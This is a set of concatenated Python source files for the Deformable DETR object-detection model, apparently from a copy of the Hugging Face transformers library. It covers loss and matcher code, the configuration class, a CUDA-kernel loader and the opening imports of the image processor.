criterion = DeformableDetrLoss(
matcher=matcher,
num_classes=self.config.num_labels,
focal_alpha=self.config.focal_alpha,
losses=losses,
)
criterion.to(self.device)
# Third: compute the losses, based on outputs and labels
outputs_loss = {}
outputs_loss["logits"] = logits
outputs_loss["pred_boxes"] = pred_boxes
if self.config.auxiliary_loss:
auxiliary_outputs = self._set_aux_loss(outputs_class, outputs_coord)
outputs_loss["auxiliary_outputs"] = auxiliary_outputs
if self.config.two_stage:
enc_outputs_coord = outputs.enc_outputs_coord_logits.sigmoid()
outputs["enc_outputs"] = {"pred_logits": outputs.enc_outputs_class, "pred_boxes": enc_outputs_coord}
loss_dict = criterion(outputs_loss, labels)
# Fourth: compute total loss, as a weighted sum of the various losses
weight_dict = {"loss_ce": 1, "loss_bbox": self.config.bbox_loss_coefficient}
weight_dict["loss_giou"] = self.config.giou_loss_coefficient
if self.config.auxiliary_loss:
aux_weight_dict = {}
for i in range(self.config.decoder_layers - 1):
aux_weight_dict.update({k + f"_{i}": v for k, v in weight_dict.items()})
weight_dict.update(aux_weight_dict)
loss = sum(loss_dict[k] * weight_dict[k] for k in loss_dict.keys() if k in weight_dict)
if not return_dict:
if auxiliary_outputs is not None:
output = (logits, pred_boxes) + auxiliary_outputs + outputs
else:
output = (logits, pred_boxes) + outputs
tuple_outputs = ((loss, loss_dict) + output) if loss is not None else output
return tuple_outputs
dict_outputs = DeformableDetrObjectDetectionOutput(
loss=loss,
loss_dict=loss_dict,
logits=logits,
pred_boxes=pred_boxes,
auxiliary_outputs=auxiliary_outputs,
last_hidden_state=outputs.last_hidden_state,
decoder_hidden_states=outputs.decoder_hidden_states,
decoder_attentions=outputs.decoder_attentions,
cross_attentions=outputs.cross_attentions,
encoder_last_hidden_state=outputs.encoder_last_hidden_state,
encoder_hidden_states=outputs.encoder_hidden_states,
encoder_attentions=outputs.encoder_attentions,
intermediate_hidden_states=outputs.intermediate_hidden_states,
intermediate_reference_points=outputs.intermediate_reference_points,
init_reference_points=outputs.init_reference_points,
enc_outputs_class=outputs.enc_outputs_class,
enc_outputs_coord_logits=outputs.enc_outputs_coord_logits,
)
return dict_outputs
# Copied from transformers.models.detr.modeling_detr.dice_loss
def dice_loss(inputs, targets, num_boxes):
"""
Compute the DICE loss, similar to generalized IOU for masks
Args:
inputs: A float tensor of arbitrary shape.
The predictions for each example.
targets: A float tensor with the same shape as inputs. Stores the binary
classification label for each element in inputs (0 for the negative class and 1 for the positive
class).
"""
inputs = inputs.sigmoid()
inputs = inputs.flatten(1)
numerator = 2 * (inputs * targets).sum(1)
denominator = inputs.sum(-1) + targets.sum(-1)
loss = 1 - (numerator + 1) / (denominator + 1)
return loss.sum() / num_boxes
# Copied from transformers.models.detr.modeling_detr.sigmoid_focal_loss
def sigmoid_focal_loss(inputs, targets, num_boxes, alpha: float = 0.25, gamma: float = 2):
"""
Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.
Args:
inputs (`torch.FloatTensor` of arbitrary shape):
The predictions for each example.
targets (`torch.FloatTensor` with the same shape as `inputs`)
A tensor storing the binary classification label for each element in the `inputs` (0 for the negative class
and 1 for the positive class).
alpha (`float`, *optional*, defaults to `0.25`):
Optional weighting factor in the range (0,1) to balance positive vs. negative examples.
gamma (`int`, *optional*, defaults to `2`):
Exponent of the modulating factor (1 - p_t) to balance easy vs hard examples.
Returns:
Loss tensor
"""
prob = inputs.sigmoid()
ce_loss = nn.functional.binary_cross_entropy_with_logits(inputs, targets, reduction="none")
# add modulating factor
p_t = prob * targets + (1 - prob) * (1 - targets)
loss = ce_loss * ((1 - p_t) ** gamma)
if alpha >= 0:
alpha_t = alpha * targets + (1 - alpha) * (1 - targets)
loss = alpha_t * loss
return loss.mean(1).sum() / num_boxes
class DeformableDetrLoss(nn.Module):
"""
This class computes the losses for `DeformableDetrForObjectDetection`. The process happens in two steps: 1) we
compute hungarian assignment between ground truth boxes and the outputs of the model 2) we supervise each pair of
matched ground-truth / prediction (supervise class and box).
Args:
matcher (`DeformableDetrHungarianMatcher`):
Module able to compute a matching between targets and proposals.
num_classes (`int`):
Number of object categories, omitting the special no-object category.
focal_alpha (`float`):
Alpha parameter in focal loss.
losses (`List[str]`):
List of all the losses to be applied. See `get_loss` for a list of all available losses.
"""
def __init__(self, matcher, num_classes, focal_alpha, losses):
super().__init__()
self.matcher = matcher
self.num_classes = num_classes
self.focal_alpha = focal_alpha
self.losses = losses
# removed logging parameter, which was part of the original implementation
def loss_labels(self, outputs, targets, indices, num_boxes):
"""
Classification loss (Binary focal loss) targets dicts must contain the key "class_labels" containing a tensor
of dim [nb_target_boxes]
"""
if "logits" not in outputs:
raise KeyError("No logits were found in the outputs")
source_logits = outputs["logits"]
idx = self._get_source_permutation_idx(indices)
target_classes_o = torch.cat([t["class_labels"][J] for t, (_, J) in zip(targets, indices)])
target_classes = torch.full(
source_logits.shape[:2], self.num_classes, dtype=torch.int64, device=source_logits.device
)
target_classes[idx] = target_classes_o
target_classes_onehot = torch.zeros(
[source_logits.shape[0], source_logits.shape[1], source_logits.shape[2] + 1],
dtype=source_logits.dtype,
layout=source_logits.layout,
device=source_logits.device,
)
target_classes_onehot.scatter_(2, target_classes.unsqueeze(-1), 1)
target_classes_onehot = target_classes_onehot[:, :, :-1]
loss_ce = (
sigmoid_focal_loss(source_logits, target_classes_onehot, num_boxes, alpha=self.focal_alpha, gamma=2)
* source_logits.shape[1]
)
losses = {"loss_ce": loss_ce}
return losses
@torch.no_grad()
# Copied from transformers.models.detr.modeling_detr.DetrLoss.loss_cardinality
def loss_cardinality(self, outputs, targets, indices, num_boxes):
"""
Compute the cardinality error, i.e. the absolute error in the number of predicted non-empty boxes.
This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients.
"""
logits = outputs["logits"]
device = logits.device
target_lengths = torch.as_tensor([len(v["class_labels"]) for v in targets], device=device)
# Count the number of predictions that are NOT "no-object" (which is the last class)
card_pred = (logits.argmax(-1) != logits.shape[-1] - 1).sum(1)
card_err = nn.functional.l1_loss(card_pred.float(), target_lengths.float())
losses = {"cardinality_error": card_err}
return losses
# Copied from transformers.models.detr.modeling_detr.DetrLoss.loss_boxes
def loss_boxes(self, outputs, targets, indices, num_boxes):
"""
Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss.
Targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]. The target boxes
are expected in format (center_x, center_y, w, h), normalized by the image size.
"""
if "pred_boxes" not in outputs:
raise KeyError("No predicted boxes found in outputs")
idx = self._get_source_permutation_idx(indices)
source_boxes = outputs["pred_boxes"][idx]
target_boxes = torch.cat([t["boxes"][i] for t, (_, i) in zip(targets, indices)], dim=0)
loss_bbox = nn.functional.l1_loss(source_boxes, target_boxes, reduction="none")
losses = {}
losses["loss_bbox"] = loss_bbox.sum() / num_boxes
loss_giou = 1 - torch.diag(
generalized_box_iou(center_to_corners_format(source_boxes), center_to_corners_format(target_boxes))
)
losses["loss_giou"] = loss_giou.sum() / num_boxes
return losses
# Copied from transformers.models.detr.modeling_detr.DetrLoss._get_source_permutation_idx
def _get_source_permutation_idx(self, indices):
# permute predictions following indices
batch_idx = torch.cat([torch.full_like(source, i) for i, (source, _) in enumerate(indices)])
source_idx = torch.cat([source for (source, _) in indices])
return batch_idx, source_idx
# Copied from transformers.models.detr.modeling_detr.DetrLoss._get_target_permutation_idx
def _get_target_permutation_idx(self, indices):
# permute targets following indices
batch_idx = torch.cat([torch.full_like(target, i) for i, (_, target) in enumerate(indices)])
target_idx = torch.cat([target for (_, target) in indices])
return batch_idx, target_idx
def get_loss(self, loss, outputs, targets, indices, num_boxes):
loss_map = {
"labels": self.loss_labels,
"cardinality": self.loss_cardinality,
"boxes": self.loss_boxes,
}
if loss not in loss_map:
raise ValueError(f"Loss {loss} not supported")
return loss_map[loss](outputs, targets, indices, num_boxes)
def forward(self, outputs, targets):
"""
This performs the loss computation.
Args:
outputs (`dict`, *optional*):
Dictionary of tensors, see the output specification of the model for the format.
targets (`List[dict]`, *optional*):
List of dicts, such that `len(targets) == batch_size`. The expected keys in each dict depends on the
losses applied, see each loss' doc.
"""
outputs_without_aux = {k: v for k, v in outputs.items() if k != "auxiliary_outputs"}
# Retrieve the matching between the outputs of the last layer and the targets
indices = self.matcher(outputs_without_aux, targets)
# Compute the average number of target boxes accross all nodes, for normalization purposes
num_boxes = sum(len(t["class_labels"]) for t in targets)
num_boxes = torch.as_tensor([num_boxes], dtype=torch.float, device=next(iter(outputs.values())).device)
# (Niels): comment out function below, distributed training to be added
# if is_dist_avail_and_initialized():
# torch.distributed.all_reduce(num_boxes)
# (Niels) in original implementation, num_boxes is divided by get_world_size()
num_boxes = torch.clamp(num_boxes, min=1).item()
# Compute all the requested losses
losses = {}
for loss in self.losses:
losses.update(self.get_loss(loss, outputs, targets, indices, num_boxes))
# In case of auxiliary losses, we repeat this process with the output of each intermediate layer.
if "auxiliary_outputs" in outputs:
for i, auxiliary_outputs in enumerate(outputs["auxiliary_outputs"]):
indices = self.matcher(auxiliary_outputs, targets)
for loss in self.losses:
l_dict = self.get_loss(loss, auxiliary_outputs, targets, indices, num_boxes)
l_dict = {k + f"_{i}": v for k, v in l_dict.items()}
losses.update(l_dict)
if "enc_outputs" in outputs:
enc_outputs = outputs["enc_outputs"]
bin_targets = copy.deepcopy(targets)
for bt in bin_targets:
bt["labels"] = torch.zeros_like(bt["labels"])
indices = self.matcher(enc_outputs, bin_targets)
for loss in self.losses:
kwargs = {}
if loss == "labels":
# Logging is enabled only for the last layer
kwargs["log"] = False
l_dict = self.get_loss(loss, enc_outputs, bin_targets, indices, num_boxes, **kwargs)
l_dict = {k + "_enc": v for k, v in l_dict.items()}
losses.update(l_dict)
return losses
# Copied from transformers.models.detr.modeling_detr.DetrMLPPredictionHead
class DeformableDetrMLPPredictionHead(nn.Module):
"""
Very simple multi-layer perceptron (MLP, also called FFN), used to predict the normalized center coordinates,
height and width of a bounding box w.r.t. an image.
Copied from https://github.com/facebookresearch/detr/blob/master/models/detr.py
"""
def __init__(self, input_dim, hidden_dim, output_dim, num_layers):
super().__init__()
self.num_layers = num_layers
h = [hidden_dim] * (num_layers - 1)
self.layers = nn.ModuleList(nn.Linear(n, k) for n, k in zip([input_dim] + h, h + [output_dim]))
def forward(self, x):
for i, layer in enumerate(self.layers):
x = nn.functional.relu(layer(x)) if i < self.num_layers - 1 else layer(x)
return x
class DeformableDetrHungarianMatcher(nn.Module):
"""
This class computes an assignment between the targets and the predictions of the network.
For efficiency reasons, the targets don't include the no_object. Because of this, in general, there are more
predictions than targets. In this case, we do a 1-to-1 matching of the best predictions, while the others are
un-matched (and thus treated as non-objects).
Args:
class_cost:
The relative weight of the classification error in the matching cost.
bbox_cost:
The relative weight of the L1 error of the bounding box coordinates in the matching cost.
giou_cost:
The relative weight of the giou loss of the bounding box in the matching cost.
"""
def __init__(self, class_cost: float = 1, bbox_cost: float = 1, giou_cost: float = 1):
super().__init__()
requires_backends(self, ["scipy"])
self.class_cost = class_cost
self.bbox_cost = bbox_cost
self.giou_cost = giou_cost
if class_cost == 0 and bbox_cost == 0 and giou_cost == 0:
raise ValueError("All costs of the Matcher can't be 0")
@torch.no_grad()
def forward(self, outputs, targets):
"""
Args:
outputs (`dict`):
A dictionary that contains at least these entries:
* "logits": Tensor of dim [batch_size, num_queries, num_classes] with the classification logits
* "pred_boxes": Tensor of dim [batch_size, num_queries, 4] with the predicted box coordinates.
targets (`List[dict]`):
A list of targets (len(targets) = batch_size), where each target is a dict containing:
* "class_labels": Tensor of dim [num_target_boxes] (where num_target_boxes is the number of
ground-truth
objects in the target) containing the class labels
* "boxes": Tensor of dim [num_target_boxes, 4] containing the target box coordinates.
Returns:
`List[Tuple]`: A list of size `batch_size`, containing tuples of (index_i, index_j) where:
- index_i is the indices of the selected predictions (in order)
- index_j is the indices of the corresponding selected targets (in order)
For each batch element, it holds: len(index_i) = len(index_j) = min(num_queries, num_target_boxes)
"""
batch_size, num_queries = outputs["logits"].shape[:2]
# We flatten to compute the cost matrices in a batch
out_prob = outputs["logits"].flatten(0, 1).sigmoid() # [batch_size * num_queries, num_classes]
out_bbox = outputs["pred_boxes"].flatten(0, 1) # [batch_size * num_queries, 4]
# Also concat the target labels and boxes
target_ids = torch.cat([v["class_labels"] for v in targets])
target_bbox = torch.cat([v["boxes"] for v in targets])
# Compute the classification cost.
alpha = 0.25
gamma = 2.0
neg_cost_class = (1 - alpha) * (out_prob**gamma) * (-(1 - out_prob + 1e-8).log())
pos_cost_class = alpha * ((1 - out_prob) ** gamma) * (-(out_prob + 1e-8).log())
class_cost = pos_cost_class[:, target_ids] - neg_cost_class[:, target_ids]
# Compute the L1 cost between boxes
bbox_cost = torch.cdist(out_bbox, target_bbox, p=1)
# Compute the giou cost between boxes
giou_cost = -generalized_box_iou(center_to_corners_format(out_bbox), center_to_corners_format(target_bbox))
# Final cost matrix
cost_matrix = self.bbox_cost * bbox_cost + self.class_cost * class_cost + self.giou_cost * giou_cost
cost_matrix = cost_matrix.view(batch_size, num_queries, -1).cpu()
sizes = [len(v["boxes"]) for v in targets]
indices = [linear_sum_assignment(c[i]) for i, c in enumerate(cost_matrix.split(sizes, -1))]
return [(torch.as_tensor(i, dtype=torch.int64), torch.as_tensor(j, dtype=torch.int64)) for i, j in indices]
# Copied from transformers.models.detr.modeling_detr._upcast
def _upcast(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.is_floating_point():
return t if t.dtype in (torch.float32, torch.float64) else t.float()
else:
return t if t.dtype in (torch.int32, torch.int64) else t.int()
# Copied from transformers.models.detr.modeling_detr.box_area
def box_area(boxes: Tensor) -> Tensor:
"""
Computes the area of a set of bounding boxes, which are specified by its (x1, y1, x2, y2) coordinates.
Args:
boxes (`torch.FloatTensor` of shape `(number_of_boxes, 4)`):
Boxes for which the area will be computed. They are expected to be in (x1, y1, x2, y2) format with `0 <= x1
< x2` and `0 <= y1 < y2`.
Returns:
`torch.FloatTensor`: a tensor containing the area for each box.
"""
boxes = _upcast(boxes)
return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])
# Copied from transformers.models.detr.modeling_detr.box_iou
def box_iou(boxes1, boxes2):
area1 = box_area(boxes1)
area2 = box_area(boxes2)
left_top = torch.max(boxes1[:, None, :2], boxes2[:, :2]) # [N,M,2]
right_bottom = torch.min(boxes1[:, None, 2:], boxes2[:, 2:]) # [N,M,2]
width_height = (right_bottom - left_top).clamp(min=0) # [N,M,2]
inter = width_height[:, :, 0] * width_height[:, :, 1] # [N,M]
union = area1[:, None] + area2 - inter
iou = inter / union
return iou, union
# Copied from transformers.models.detr.modeling_detr.generalized_box_iou
def generalized_box_iou(boxes1, boxes2):
"""
Generalized IoU from https://giou.stanford.edu/. The boxes should be in [x0, y0, x1, y1] (corner) format.
Returns:
`torch.FloatTensor`: a [N, M] pairwise matrix, where N = len(boxes1) and M = len(boxes2)
"""
# degenerate boxes gives inf / nan results
# so do an early check
if not (boxes1[:, 2:] >= boxes1[:, :2]).all():
raise ValueError(f"boxes1 must be in [x0, y0, x1, y1] (corner) format, but got {boxes1}")
if not (boxes2[:, 2:] >= boxes2[:, :2]).all():
raise ValueError(f"boxes2 must be in [x0, y0, x1, y1] (corner) format, but got {boxes2}")
iou, union = box_iou(boxes1, boxes2)
top_left = torch.min(boxes1[:, None, :2], boxes2[:, :2])
bottom_right = torch.max(boxes1[:, None, 2:], boxes2[:, 2:])
width_height = (bottom_right - top_left).clamp(min=0) # [N,M,2]
area = width_height[:, :, 0] * width_height[:, :, 1]
return iou - (area - union) / area
# Copied from transformers.models.detr.modeling_detr._max_by_axis
def _max_by_axis(the_list):
# type: (List[List[int]]) -> List[int]
maxes = the_list[0]
for sublist in the_list[1:]:
for index, item in enumerate(sublist):
maxes[index] = max(maxes[index], item)
return maxes
# Copied from transformers.models.detr.modeling_detr.NestedTensor
class NestedTensor(object):
def __init__(self, tensors, mask: Optional[Tensor]):
self.tensors = tensors
self.mask = mask
def to(self, device):
cast_tensor = self.tensors.to(device)
mask = self.mask
if mask is not None:
cast_mask = mask.to(device)
else:
cast_mask = None
return NestedTensor(cast_tensor, cast_mask)
def decompose(self):
return self.tensors, self.mask
def __repr__(self):
return str(self.tensors)
# Copied from transformers.models.detr.modeling_detr.nested_tensor_from_tensor_list
def nested_tensor_from_tensor_list(tensor_list: List[Tensor]):
if tensor_list[0].ndim == 3:
max_size = _max_by_axis([list(img.shape) for img in tensor_list])
batch_shape = [len(tensor_list)] + max_size
batch_size, num_channels, height, width = batch_shape
dtype = tensor_list[0].dtype
device = tensor_list[0].device
tensor = torch.zeros(batch_shape, dtype=dtype, device=device)
mask = torch.ones((batch_size, height, width), dtype=torch.bool, device=device)
for img, pad_img, m in zip(tensor_list, tensor, mask):
pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img)
m[: img.shape[1], : img.shape[2]] = False
else:
raise ValueError("Only 3-dimensional tensors are supported")
return NestedTensor(tensor, mask)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 13,361 | src/transformers/models/deformable_detr/configuration_deformable_detr.py | # coding=utf-8
# Copyright 2022 SenseTime and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Deformable DETR model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
from ..auto import CONFIG_MAPPING
logger = logging.get_logger(__name__)
DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"SenseTime/deformable-detr": "https://huggingface.co/sensetime/deformable-detr/resolve/main/config.json",
# See all Deformable DETR models at https://huggingface.co/models?filter=deformable-detr
}
class DeformableDetrConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`DeformableDetrModel`]. It is used to instantiate
a Deformable DETR model according to the specified arguments, defining the model architecture. Instantiating a
configuration with the defaults will yield a similar configuration to that of the Deformable DETR
[SenseTime/deformable-detr](https://huggingface.co/SenseTime/deformable-detr) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
use_timm_backbone (`bool`, *optional*, defaults to `True`):
Whether or not to use the `timm` library for the backbone. If set to `False`, will use the [`AutoBackbone`]
API.
backbone_config (`PretrainedConfig` or `dict`, *optional*):
The configuration of the backbone model. Only used in case `use_timm_backbone` is set to `False` in which
case it will default to `ResNetConfig()`.
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
num_queries (`int`, *optional*, defaults to 300):
Number of object queries, i.e. detection slots. This is the maximal number of objects
[`DeformableDetrModel`] can detect in a single image. In case `two_stage` is set to `True`, we use
`two_stage_num_proposals` instead.
d_model (`int`, *optional*, defaults to 256):
Dimension of the layers.
encoder_layers (`int`, *optional*, defaults to 6):
Number of encoder layers.
decoder_layers (`int`, *optional*, defaults to 6):
Number of decoder layers.
encoder_attention_heads (`int`, *optional*, defaults to 8):
Number of attention heads for each attention layer in the Transformer encoder.
decoder_attention_heads (`int`, *optional*, defaults to 8):
Number of attention heads for each attention layer in the Transformer decoder.
decoder_ffn_dim (`int`, *optional*, defaults to 1024):
Dimension of the "intermediate" (often named feed-forward) layer in decoder.
encoder_ffn_dim (`int`, *optional*, defaults to 1024):
Dimension of the "intermediate" (often named feed-forward) layer in decoder.
activation_function (`str` or `function`, *optional*, defaults to `"relu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"silu"` and `"gelu_new"` are supported.
dropout (`float`, *optional*, defaults to 0.1):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
attention_dropout (`float`, *optional*, defaults to 0.0):
The dropout ratio for the attention probabilities.
activation_dropout (`float`, *optional*, defaults to 0.0):
The dropout ratio for activations inside the fully connected layer.
init_std (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
init_xavier_std (`float`, *optional*, defaults to 1):
The scaling factor used for the Xavier initialization gain in the HM Attention map module.
encoder_layerdrop: (`float`, *optional*, defaults to 0.0):
The LayerDrop probability for the encoder. See the [LayerDrop paper](see https://arxiv.org/abs/1909.11556)
for more details.
auxiliary_loss (`bool`, *optional*, defaults to `False`):
Whether auxiliary decoding losses (loss at each decoder layer) are to be used.
position_embedding_type (`str`, *optional*, defaults to `"sine"`):
Type of position embeddings to be used on top of the image features. One of `"sine"` or `"learned"`.
backbone (`str`, *optional*, defaults to `"resnet50"`):
Name of convolutional backbone to use in case `use_timm_backbone` = `True`. Supports any convolutional
backbone from the timm package. For a list of all available models, see [this
page](https://rwightman.github.io/pytorch-image-models/#load-a-pretrained-model).
use_pretrained_backbone (`bool`, *optional*, defaults to `True`):
Whether to use pretrained weights for the backbone. Only supported when `use_timm_backbone` = `True`.
dilation (`bool`, *optional*, defaults to `False`):
Whether to replace stride with dilation in the last convolutional block (DC5). Only supported when
`use_timm_backbone` = `True`.
class_cost (`float`, *optional*, defaults to 1):
Relative weight of the classification error in the Hungarian matching cost.
bbox_cost (`float`, *optional*, defaults to 5):
Relative weight of the L1 error of the bounding box coordinates in the Hungarian matching cost.
giou_cost (`float`, *optional*, defaults to 2):
Relative weight of the generalized IoU loss of the bounding box in the Hungarian matching cost.
mask_loss_coefficient (`float`, *optional*, defaults to 1):
Relative weight of the Focal loss in the panoptic segmentation loss.
dice_loss_coefficient (`float`, *optional*, defaults to 1):
Relative weight of the DICE/F-1 loss in the panoptic segmentation loss.
bbox_loss_coefficient (`float`, *optional*, defaults to 5):
Relative weight of the L1 bounding box loss in the object detection loss.
giou_loss_coefficient (`float`, *optional*, defaults to 2):
Relative weight of the generalized IoU loss in the object detection loss.
eos_coefficient (`float`, *optional*, defaults to 0.1):
Relative classification weight of the 'no-object' class in the object detection loss.
num_feature_levels (`int`, *optional*, defaults to 4):
The number of input feature levels.
encoder_n_points (`int`, *optional*, defaults to 4):
The number of sampled keys in each feature level for each attention head in the encoder.
decoder_n_points (`int`, *optional*, defaults to 4):
The number of sampled keys in each feature level for each attention head in the decoder.
two_stage (`bool`, *optional*, defaults to `False`):
Whether to apply a two-stage deformable DETR, where the region proposals are also generated by a variant of
Deformable DETR, which are further fed into the decoder for iterative bounding box refinement.
two_stage_num_proposals (`int`, *optional*, defaults to 300):
The number of region proposals to be generated, in case `two_stage` is set to `True`.
with_box_refine (`bool`, *optional*, defaults to `False`):
Whether to apply iterative bounding box refinement, where each decoder layer refines the bounding boxes
based on the predictions from the previous layer.
focal_alpha (`float`, *optional*, defaults to 0.25):
Alpha parameter in the focal loss.
Examples:
```python
>>> from transformers import DeformableDetrConfig, DeformableDetrModel
>>> # Initializing a Deformable DETR SenseTime/deformable-detr style configuration
>>> configuration = DeformableDetrConfig()
>>> # Initializing a model (with random weights) from the SenseTime/deformable-detr style configuration
>>> model = DeformableDetrModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "deformable_detr"
attribute_map = {
"hidden_size": "d_model",
"num_attention_heads": "encoder_attention_heads",
}
def __init__(
self,
use_timm_backbone=True,
backbone_config=None,
num_channels=3,
num_queries=300,
max_position_embeddings=1024,
encoder_layers=6,
encoder_ffn_dim=1024,
encoder_attention_heads=8,
decoder_layers=6,
decoder_ffn_dim=1024,
decoder_attention_heads=8,
encoder_layerdrop=0.0,
is_encoder_decoder=True,
activation_function="relu",
d_model=256,
dropout=0.1,
attention_dropout=0.0,
activation_dropout=0.0,
init_std=0.02,
init_xavier_std=1.0,
return_intermediate=True,
auxiliary_loss=False,
position_embedding_type="sine",
backbone="resnet50",
use_pretrained_backbone=True,
dilation=False,
num_feature_levels=4,
encoder_n_points=4,
decoder_n_points=4,
two_stage=False,
two_stage_num_proposals=300,
with_box_refine=False,
class_cost=1,
bbox_cost=5,
giou_cost=2,
mask_loss_coefficient=1,
dice_loss_coefficient=1,
bbox_loss_coefficient=5,
giou_loss_coefficient=2,
eos_coefficient=0.1,
focal_alpha=0.25,
**kwargs,
):
if backbone_config is not None and use_timm_backbone:
raise ValueError("You can't specify both `backbone_config` and `use_timm_backbone`.")
if not use_timm_backbone:
if backbone_config is None:
logger.info("`backbone_config` is `None`. Initializing the config with the default `ResNet` backbone.")
backbone_config = CONFIG_MAPPING["resnet"](out_features=["stage4"])
elif isinstance(backbone_config, dict):
backbone_model_type = backbone_config.get("model_type")
config_class = CONFIG_MAPPING[backbone_model_type]
backbone_config = config_class.from_dict(backbone_config)
self.use_timm_backbone = use_timm_backbone
self.backbone_config = backbone_config
self.num_channels = num_channels
self.num_queries = num_queries
self.max_position_embeddings = max_position_embeddings
self.d_model = d_model
self.encoder_ffn_dim = encoder_ffn_dim
self.encoder_layers = encoder_layers
self.encoder_attention_heads = encoder_attention_heads
self.decoder_ffn_dim = decoder_ffn_dim
self.decoder_layers = decoder_layers
self.decoder_attention_heads = decoder_attention_heads
self.dropout = dropout
self.attention_dropout = attention_dropout
self.activation_dropout = activation_dropout
self.activation_function = activation_function
self.init_std = init_std
self.init_xavier_std = init_xavier_std
self.encoder_layerdrop = encoder_layerdrop
self.auxiliary_loss = auxiliary_loss
self.position_embedding_type = position_embedding_type
self.backbone = backbone
self.use_pretrained_backbone = use_pretrained_backbone
self.dilation = dilation
# deformable attributes
self.num_feature_levels = num_feature_levels
self.encoder_n_points = encoder_n_points
self.decoder_n_points = decoder_n_points
self.two_stage = two_stage
self.two_stage_num_proposals = two_stage_num_proposals
self.with_box_refine = with_box_refine
if two_stage is True and with_box_refine is False:
raise ValueError("If two_stage is True, with_box_refine must be True.")
# Hungarian matcher
self.class_cost = class_cost
self.bbox_cost = bbox_cost
self.giou_cost = giou_cost
# Loss coefficients
self.mask_loss_coefficient = mask_loss_coefficient
self.dice_loss_coefficient = dice_loss_coefficient
self.bbox_loss_coefficient = bbox_loss_coefficient
self.giou_loss_coefficient = giou_loss_coefficient
self.eos_coefficient = eos_coefficient
self.focal_alpha = focal_alpha
super().__init__(is_encoder_decoder=is_encoder_decoder, **kwargs)
@property
def num_attention_heads(self) -> int:
return self.encoder_attention_heads
@property
def hidden_size(self) -> int:
return self.d_model
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,635 | src/transformers/models/deformable_detr/load_custom.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Loading of Deformable DETR's CUDA kernels"""
import os
def load_cuda_kernels():
from torch.utils.cpp_extension import load
root = os.path.join(os.path.dirname(os.path.realpath(__file__)), "custom_kernel")
src_files = [
os.path.join(root, filename)
for filename in [
"vision.cpp",
os.path.join("cpu", "ms_deform_attn_cpu.cpp"),
os.path.join("cuda", "ms_deform_attn_cuda.cu"),
]
]
load(
"MultiScaleDeformableAttention",
src_files,
# verbose=True,
with_cuda=True,
extra_include_paths=[root],
# build_directory=os.path.dirname(os.path.realpath(__file__)),
extra_cflags=["-DWITH_CUDA=1"],
extra_cuda_cflags=[
"-DCUDA_HAS_FP16=1",
"-D__CUDA_NO_HALF_OPERATORS__",
"-D__CUDA_NO_HALF_CONVERSIONS__",
"-D__CUDA_NO_HALF2_OPERATORS__",
],
)
import MultiScaleDeformableAttention as MSDA
return MSDA
|
27182812/ChatGLM-LLaMA-chinese-insturct | 60,029 | src/transformers/models/deformable_detr/image_processing_deformable_detr.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Deformable DETR."""
import io
import pathlib
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple, Union
import numpy as np
from ...feature_extraction_utils import BatchFeature
from ...image_processing_utils import BaseImageProcessor, get_size_dict
from ...image_transforms import (
PaddingMode,
center_to_corners_format,
corners_to_center_format,
id_to_rgb,
normalize,
pad,
rescale,
resize,
rgb_to_id,
to_channel_dimension_format,
)
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
get_image_size,
infer_channel_dimension_format,
make_list_of_images,
to_numpy_array,
valid_coco_detection_annotations,
valid_coco_panoptic_annotations,
valid_images,
)
from ...utils import (
ExplicitEnum,
TensorType,
is_flax_available,
is_jax_tensor,
is_scipy_available,
is_tf_available,
is_tf_tensor,
is_torch_available,
is_torch_tensor,
is_vision_available,
)
if is_torch_available():
import torch
from torch import nn
from ...pytorch_utils import torch_int_div
if is_vision_available():
import PIL
if is_scipy_available():
import scipy.special
import scipy.stats
AnnotationType = Dict[str, Union[int, str, List[Dict]]]
class AnnotionFormat(ExplicitEnum):
COCO_DETECTION = "coco_detection"
